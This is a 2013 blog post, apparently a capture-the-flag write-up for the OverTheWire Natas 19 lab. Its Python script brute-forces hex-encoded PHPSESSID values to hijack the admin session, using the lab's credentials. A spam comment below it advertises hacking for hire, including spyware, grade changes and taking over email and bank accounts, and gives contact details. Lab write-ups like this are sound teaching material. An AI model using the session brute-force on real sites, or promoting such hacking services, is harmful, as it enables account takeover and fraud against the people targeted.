DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Friday, December 13, 2013

OverTheWire Natas 19

When inspecting our PHPSESSID cookie, we can see it's seems to be encoded in hex. Decoding it reveals it's true and the structure is:
PHPSESSID = hex((sessid)+'-'+(username))

when (sessid) is a random number probably in {1,2,...,641} (inspected by deleting the PHPSESSID cookie several times)

We are interested, again, in the admin user session. So, (username) will be replaced with 'admin' and we will use brute-force on the (sessid) parameter as we did in the previous level. 

import requests

for sessid in range(641,0,-1):
 r = requests.get('http://natas19.natas.labs.overthewire.org', \
            auth=('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'), \
            cookies={'PHPSESSID':(str(sessid)+'-admin').encode('hex')})
 
 if 'You are an admin' in r.content:
  print r.content # print next level credentials
  break
Solved :)

1 comment :

  1. UnknownDecember 9, 2017 at 10:26 AM

    I DONT KNOW WHAT YOU HAVE BEEN THROUGH OR HOW LONG YOU HAVE BEEN LOOKING BUT THIS IS THE LAST STOP AS THERE IS A HACKER WHO CAN HELP YOU WITH SPY WARE ON YOUR CHEATING PARTNER OR UPGRADE YOUR SCHOOL SCORES OR HELP WITH RESULT AND CLEAR ANY CRIMINAL RECORD..

    HACKING OF FACEBOOK , EMAIL , AND BANK ACCOUNTS ARE HIS SPECIALTY.. EMAIL : GREENFR1007@GMAIL.COM OR SKYPE:SATISH.ANCHAN4

    BEST EVER

    ReplyDelete

Subscribe to: Post Comments ( Atom )